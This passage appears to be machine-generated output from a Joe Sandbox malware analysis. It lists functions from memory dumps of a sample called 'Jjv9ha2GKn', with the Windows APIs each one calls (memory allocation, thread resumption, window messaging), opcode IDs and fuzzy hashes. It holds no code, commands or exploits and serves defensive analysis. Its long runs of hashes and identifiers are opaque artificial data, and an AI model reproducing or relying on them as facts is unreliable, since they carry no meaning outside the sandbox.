                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 42ddf233fba20628728175523078ec6cb551ffde6f281eadefb1e823fd04e1c6
                                                                                                            • Instruction ID: 438739ef933241a12ab8f7a7f8b92a129b86b951f4bfbe210a80e2501ea3feef
                                                                                                            • Opcode Fuzzy Hash: 42ddf233fba20628728175523078ec6cb551ffde6f281eadefb1e823fd04e1c6
                                                                                                            • Instruction Fuzzy Hash: 13113AB19002499FCB10DFAAC844AEEFFF5FF48314F108419E519A7250C7759940CFA0
                                                                                                            Function 075DDED8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: d11ab99900ebe296827fbdf32e042878ab819ba5a3791042e932db17e6388d4a
                                                                                                            • Instruction ID: 2dbaa0223a7e1cac944a2804b29e347d38abd99c670e7d3d71432632525fcd4e
                                                                                                            • Opcode Fuzzy Hash: d11ab99900ebe296827fbdf32e042878ab819ba5a3791042e932db17e6388d4a
                                                                                                            • Instruction Fuzzy Hash: 59113AB1D003498FCB20DFAAC4457EEFBF5EF88314F20841AD519A7244CB79A945CBA4
                                                                                                            Function 05B98998 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 05B989FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2760678362.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5b90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 0a17460602acac918ee71e50c6b2083fffbb5810eb78875edc7272c617ce5b68
                                                                                                            • Instruction ID: 9e45d55603f5c48bd64cb51fa8dbf7ad0de6ff3a3a68f422976bc5b1e756330c
                                                                                                            • Opcode Fuzzy Hash: 0a17460602acac918ee71e50c6b2083fffbb5810eb78875edc7272c617ce5b68
                                                                                                            • Instruction Fuzzy Hash: 9411DCB6C002498FCB14DF9AD444ADEFBF9EF89324F10856AD829A7210C379A545CFA5
                                                                                                            Function 075D5888 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 075DE3D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 77fc4498f6ae8eaea50d69fa75032c84c61f19ccf17c518c12758b97fed8cb80
                                                                                                            • Instruction ID: 0a2979330fb9942fb0e491647b2c8dd8ee42bdea9c3268d8077f03d3156c01b0
                                                                                                            • Opcode Fuzzy Hash: 77fc4498f6ae8eaea50d69fa75032c84c61f19ccf17c518c12758b97fed8cb80
                                                                                                            • Instruction Fuzzy Hash: 1E11F5B5800349DFDB20DF9AC485BEEBBF8FB48714F108459E518A7200C3B5A944CFA1
                                                                                                            Function 026F9780 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4']q
                                                                                                            • API String ID: 0-1259897404
                                                                                                            • Opcode ID: aa6c61f43f0556f8cea43b93c075d9b4d015503957143d08342693c031b46a08
                                                                                                            • Instruction ID: 8af56121b74b18f1c38a8b44ef387acb032d5804269e77a96d5a727f43740ad1
                                                                                                            • Opcode Fuzzy Hash: aa6c61f43f0556f8cea43b93c075d9b4d015503957143d08342693c031b46a08
                                                                                                            • Instruction Fuzzy Hash: 0B6193317061118FCF98DF3AC894B6A7BE5BF857547098869EA16CB365DB31DC01CB60
                                                                                                            Function 026F531A Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 2bbd8216fa536726159169258a75d20a6d0409455719addcf27ec349c914295b
                                                                                                            • Instruction ID: 22d854c87e42b535505dad4a98abb2197cad0bcec2f745cd011909fcb1121efb
                                                                                                            • Opcode Fuzzy Hash: 2bbd8216fa536726159169258a75d20a6d0409455719addcf27ec349c914295b
                                                                                                            • Instruction Fuzzy Hash: 2E5148706052449FDB598B78DA7A7AEBFB5BF42300F5C809AE8468B352C7268C47C791
                                                                                                            Function 07AFDEA1 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q
                                                                                                            • API String ID: 0-3168235125
                                                                                                            • Opcode ID: 7f7e3060f4edbdf6d29ab38c4a6a322f62d85fb84ed5b69fb88a06aa45fd5d22
                                                                                                            • Instruction ID: 439558d5ab9428abef395754e0693b19938dcf7acb5fa8c2bb467a7084197041
                                                                                                            • Opcode Fuzzy Hash: 7f7e3060f4edbdf6d29ab38c4a6a322f62d85fb84ed5b69fb88a06aa45fd5d22
                                                                                                            • Instruction Fuzzy Hash: DE514771740502CFDB19CFA8C994F99BBB5BF88300F1581A9E516DB265CB31EC45CB90
                                                                                                            Function 07AF31E7 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Haq
                                                                                                            • API String ID: 0-725504367
                                                                                                            • Opcode ID: 7eb5acad3506835c1fc0b78088f59f9e549b9c296327e7d9fe82c03baa82e181
                                                                                                            • Instruction ID: 4acf313f7eb5b9fcf7cc9b6ef5747a74610027993873cae40baf0420464f9a59
                                                                                                            • Opcode Fuzzy Hash: 7eb5acad3506835c1fc0b78088f59f9e549b9c296327e7d9fe82c03baa82e181
                                                                                                            • Instruction Fuzzy Hash: B841F2727002119BCB09AFB8A99467FBAA7AFC5351F158425FA06C7395DE38CC46C392
                                                                                                            Function 07AFB109 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q
                                                                                                            • API String ID: 0-3168235125
                                                                                                            • Opcode ID: 1fa43015bb07130734a19ed5e8239314bfa107440c830e7b6f257ba00308ff9e
                                                                                                            • Instruction ID: 0e79196ed13025c29c625e1a76126481637a72132494b6c59f47e106593f3358
                                                                                                            • Opcode Fuzzy Hash: 1fa43015bb07130734a19ed5e8239314bfa107440c830e7b6f257ba00308ff9e
                                                                                                            • Instruction Fuzzy Hash: 8851E6B4A00205CFDB18DFB8C998A99B7F1BF49714B2545A8E516AB3B1DB30EC41CB50
                                                                                                            Function 07AF3CE7 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Haq
                                                                                                            • API String ID: 0-725504367
                                                                                                            • Opcode ID: cb407de7793150071a405336fa22c119adcde1835ee39207e766d28fee51870b
                                                                                                            • Instruction ID: 3a0b2de6d4f487a6ef08209d278d6e64ee353e95512043554e2dd11804d7669a
                                                                                                            • Opcode Fuzzy Hash: cb407de7793150071a405336fa22c119adcde1835ee39207e766d28fee51870b
                                                                                                            • Instruction Fuzzy Hash: 1C3139B16021119FCB159F68C1413BDBBA6AFC5300F0985ABE51997345CF34AC42C7E1
                                                                                                            Function 026F9580 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4']q
                                                                                                            • API String ID: 0-1259897404
                                                                                                            • Opcode ID: 5a42864f661a7da8cb7eda5ca3e600f1efcd8782529489253f9d89c4e8910084
                                                                                                            • Instruction ID: e2f7318bbc0aa37f36141f4f265e1cb5a6166b3e856c60879594c8f205e6f1f9
                                                                                                            • Opcode Fuzzy Hash: 5a42864f661a7da8cb7eda5ca3e600f1efcd8782529489253f9d89c4e8910084
                                                                                                            • Instruction Fuzzy Hash: 04414574600154CFDF589F69D898BAA7BB6FF88310F214069EA06CB3A1C735DC41CBA0
                                                                                                            Function 026F5515 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 9d221f85c317851e29448283cf12b12674ffff902c7061e8eea133881d782664
                                                                                                            • Instruction ID: df2bf509537f6f5d08049c8dd1ea3ba903346f0c403624d464c49e7cf7be7cb2
                                                                                                            • Opcode Fuzzy Hash: 9d221f85c317851e29448283cf12b12674ffff902c7061e8eea133881d782664
                                                                                                            • Instruction Fuzzy Hash: 0D41A270A00208DFDF98DFA9C5887AEBAF6BF85700F508529E4079B395DB359C46CB51
                                                                                                            Function 07AFE094 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (aq
                                                                                                            • API String ID: 0-600464949
                                                                                                            • Opcode ID: 55b3760920c39c2de4a9326cd8c57c0ee05227227fe8c2bb2d5ed699ce7ad063
                                                                                                            • Instruction ID: 83ec59e3edd8d0a32a47bcb6cfa5284bc3a37bbc81b1363c9e5ff4959d5c8763
                                                                                                            • Opcode Fuzzy Hash: 55b3760920c39c2de4a9326cd8c57c0ee05227227fe8c2bb2d5ed699ce7ad063
                                                                                                            • Instruction Fuzzy Hash: 104191703047018FC755DF79D848B5A7BA6AF81314F1585AAE16ACB2B1DF74E88ACB40
                                                                                                            Function 026F554C Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 01300e8a062a97e29973cfbc6aac90b4d034bb397dfacedf6a9e467a19356a6f
                                                                                                            • Instruction ID: 7b09abba7c8c94dadc9330cc3af522fded142af4c431f0cd7fccbfe5e0479174
                                                                                                            • Opcode Fuzzy Hash: 01300e8a062a97e29973cfbc6aac90b4d034bb397dfacedf6a9e467a19356a6f
                                                                                                            • Instruction Fuzzy Hash: 0231D070B00204DFDF989BA8C9587AEBBF2BF85700FA48529E1079B395DB358C46CB51
                                                                                                            Function 026F55A9 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q
                                                                                                            • API String ID: 0-52440209
                                                                                                            • Opcode ID: 2a46b891b5db92a4045f553279c9b860003b6a32f8a53634b8fcd8f52dc7ebf3
                                                                                                            • Instruction ID: 65ec46bf90c7b937253e16a1a911c9726ef2099b8ce04cb2759c887461c42266
                                                                                                            • Opcode Fuzzy Hash: 2a46b891b5db92a4045f553279c9b860003b6a32f8a53634b8fcd8f52dc7ebf3
                                                                                                            • Instruction Fuzzy Hash: 7B31B030B00208DFDF589FA9C9487AEBAF2BF84700F508529E106AB394DB358C46CB51
                                                                                                            Function 07AF7960 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $]q
                                                                                                            • API String ID: 0-1007455737
                                                                                                            • Opcode ID: e2f2b8129cd3e2dd7e0cbe2e4dee2b4287418e545cf8c947d2dff99491821669
                                                                                                            • Instruction ID: d79dd667378befbcff3047c86e89f905ecf8eaa4859730cab86e6bbf0f1d4fae
                                                                                                            • Opcode Fuzzy Hash: e2f2b8129cd3e2dd7e0cbe2e4dee2b4287418e545cf8c947d2dff99491821669
                                                                                                            • Instruction Fuzzy Hash: 2F21B5B03151068FDB98AFB998885293BEAFFC571039254A9F616CB3A1DE31DC01CB51
                                                                                                            Function 07AF7950 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $]q
                                                                                                            • API String ID: 0-1007455737
                                                                                                            • Opcode ID: 985a135fdc874271a565b0ac6af51f471921ebb6bc191589da47b031d7686039
                                                                                                            • Instruction ID: b10c857d0fa56d9c7796d8a21edfb7cd321439dff0d506e254f491106d298170
                                                                                                            • Opcode Fuzzy Hash: 985a135fdc874271a565b0ac6af51f471921ebb6bc191589da47b031d7686039
                                                                                                            • Instruction Fuzzy Hash: A521DAB07151028FDB64AFB9D48862937E5BFC575175714AAF626CB2A1DF31CC01CB50
                                                                                                            Function 07AFEEA8 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q
                                                                                                            • API String ID: 0-3168235125
                                                                                                            • Opcode ID: ca7dc0dda2661a2ff686d02439a8d409a88c871c7cc23a29a69f9b959ad389a3
                                                                                                            • Instruction ID: 7794c459e07a97d15ad7e7bf713909ebfccba6fff38ac097817dc08e7ab8d1e8
                                                                                                            • Opcode Fuzzy Hash: ca7dc0dda2661a2ff686d02439a8d409a88c871c7cc23a29a69f9b959ad389a3
                                                                                                            • Instruction Fuzzy Hash: C82181B170420ACFDB14DFA4CA58B6EBBF5AF84700F550168E616AB2A0DB71DD04CB90
                                                                                                            Function 07AFEE97 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH]q
                                                                                                            • API String ID: 0-3168235125
                                                                                                            • Opcode ID: dbffe858f0d1842a898fa6c272d754925108b2cde3cb62b6327a18478632eb5c
                                                                                                            • Instruction ID: 1e084b91ae3fba1eae6485ebf5385eaa48d3234d2a46d70a401758f5f93aef9b
                                                                                                            • Opcode Fuzzy Hash: dbffe858f0d1842a898fa6c272d754925108b2cde3cb62b6327a18478632eb5c
                                                                                                            • Instruction Fuzzy Hash: B8216FB2A04106CFDB14DFA4CA58BA9BBF1EF48700F654568E516AB3A0CB75DD05CB90
                                                                                                            Function 026F7B57 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q
                                                                                                            • API String ID: 0-794736227
                                                                                                            • Opcode ID: 7af8e078b7981c8c5754a40380234e7689a8006d15ca70dff3bb488360b17aed
                                                                                                            • Instruction ID: b73617e5bbd617319f4e379491d4d6f7c6a050317d3f78bef1d1589667e60538
                                                                                                            • Opcode Fuzzy Hash: 7af8e078b7981c8c5754a40380234e7689a8006d15ca70dff3bb488360b17aed
                                                                                                            • Instruction Fuzzy Hash: 9B1106757002018FEB089A7D995097B76DBEFC9214B11457DA605CB399EF74DC01C7B4
                                                                                                            Function 026F7B68 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q
                                                                                                            • API String ID: 0-794736227
                                                                                                            • Opcode ID: f985c03ff3861267883dc361c1a6b83fb8c269a85d6bbcab28229283748bd243
                                                                                                            • Instruction ID: ac212395558f2b73c3a1b519fc28df4895bb8c45540b812e8f5b385512fac43b
                                                                                                            • Opcode Fuzzy Hash: f985c03ff3861267883dc361c1a6b83fb8c269a85d6bbcab28229283748bd243
                                                                                                            • Instruction Fuzzy Hash: 4C11CE757002008FEB08AA7D989096BB6DE9BC9648B004539A606CB399EF74DC0187B5
                                                                                                            Function 00A906A0 Relevance: 1.3, APIs: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00A90700
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2750898480.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_a90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 08a57a8312448e5cda5a724ce5b1f7bf33b806e1bc9531336394bf24235c82ee
                                                                                                            • Instruction ID: 83156b75e4aab9ba69cfab3da4c20e6a5d59690947fe88c8d1c4f18e93d64d1a
                                                                                                            • Opcode Fuzzy Hash: 08a57a8312448e5cda5a724ce5b1f7bf33b806e1bc9531336394bf24235c82ee
                                                                                                            • Instruction Fuzzy Hash: F51125B68007499FCB20DF9AC585BEEBBF4EF48320F10845AD558A7741D338A584CFA5
                                                                                                            Function 00A906A8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00A90700
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2750898480.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_a90000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 1466090cda34f7122b48a66f3e2eb64ca41c5c71c9092c20b9df57970c46cf5b
                                                                                                            • Instruction ID: 72f6c0b2b8d0c7869ea9e685cea1de710f60d7350a8c4784c509816b63ca5168
                                                                                                            • Opcode Fuzzy Hash: 1466090cda34f7122b48a66f3e2eb64ca41c5c71c9092c20b9df57970c46cf5b
                                                                                                            • Instruction Fuzzy Hash: 161103B68007498FCB20DF9AC585BDEBBF4EF48320F10841AD558A7341D778A944CFA5
                                                                                                            Function 0715B120 Relevance: .5, Instructions: 526COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 25750edfafc160876d69804fd4011352a7a3ae4a881e6451c2f35bfb775ebea9
                                                                                                            • Instruction ID: 3503f177a4167f7e526c1a8b4fb06db066da7a2664864d16e98b537b5c5d6b2c
                                                                                                            • Opcode Fuzzy Hash: 25750edfafc160876d69804fd4011352a7a3ae4a881e6451c2f35bfb775ebea9
                                                                                                            • Instruction Fuzzy Hash: 201241B0E19218CFCB18FFB8E94925D7BB1EB88345F8044A9D449E7344DE386D85CB55
                                                                                                            Function 07159588 Relevance: .4, Instructions: 413COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 64bf04b1537b8c5e2c8817ccf35e98d659b5b9c0be4ef486f359637604b8c6ed
                                                                                                            • Instruction ID: 7ac39fb1134c8809f560e8e92fc42121b34eb9281d2790fe44a0f42a0e7ec2dc
                                                                                                            • Opcode Fuzzy Hash: 64bf04b1537b8c5e2c8817ccf35e98d659b5b9c0be4ef486f359637604b8c6ed
                                                                                                            • Instruction Fuzzy Hash: 54E18271B14615CBD708BBB8D49962D7BF2EBC4204F848979D449A7384DF3CAC86C792
                                                                                                            Function 07AF89D3 Relevance: .4, Instructions: 410COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 554c26eaa4c27a2837b1b5fb9dc0e98e7df254170d1de3d1a06eb8d5e2206447
                                                                                                            • Instruction ID: 84e6345657e71642a50f00f8e1ff953ee8a0f876453899c486f676896c072276
                                                                                                            • Opcode Fuzzy Hash: 554c26eaa4c27a2837b1b5fb9dc0e98e7df254170d1de3d1a06eb8d5e2206447
                                                                                                            • Instruction Fuzzy Hash: EA021670601205DFCB48DFA8D588AAD7BF2FF89314F1585A8E5099B3A6CB34EC46CB50
                                                                                                            Function 0715A2C0 Relevance: .4, Instructions: 379COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44fcf2861f61bf2916e833e8285d170e7e516b839acfcb9870f1bb91d7e354e8
                                                                                                            • Instruction ID: 3c5d9a52002efeafe301603c1d9a1f33b16f628c930022aec5697ac1088baf12
                                                                                                            • Opcode Fuzzy Hash: 44fcf2861f61bf2916e833e8285d170e7e516b839acfcb9870f1bb91d7e354e8
                                                                                                            • Instruction Fuzzy Hash: 67D18E70B14610DFC308BB79D49962A7BE6AFC5214F80C97CE489A7394DE3CAC46CB56
                                                                                                            Function 026FDA40 Relevance: .3, Instructions: 330COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aa8e9133d7b381ad202849e256425583451f6037819a12a19f9e82b6a8b4aa7b
                                                                                                            • Instruction ID: 35053bc8bcc15b7d755e5576b79e504c0be0f99ff5fc2699305ceb0d46d56503
                                                                                                            • Opcode Fuzzy Hash: aa8e9133d7b381ad202849e256425583451f6037819a12a19f9e82b6a8b4aa7b
                                                                                                            • Instruction Fuzzy Hash: BCB18471E246158BD754FBB8D98462E77B6ABC8218F518828D44DF3344EE3C6C86C7A3
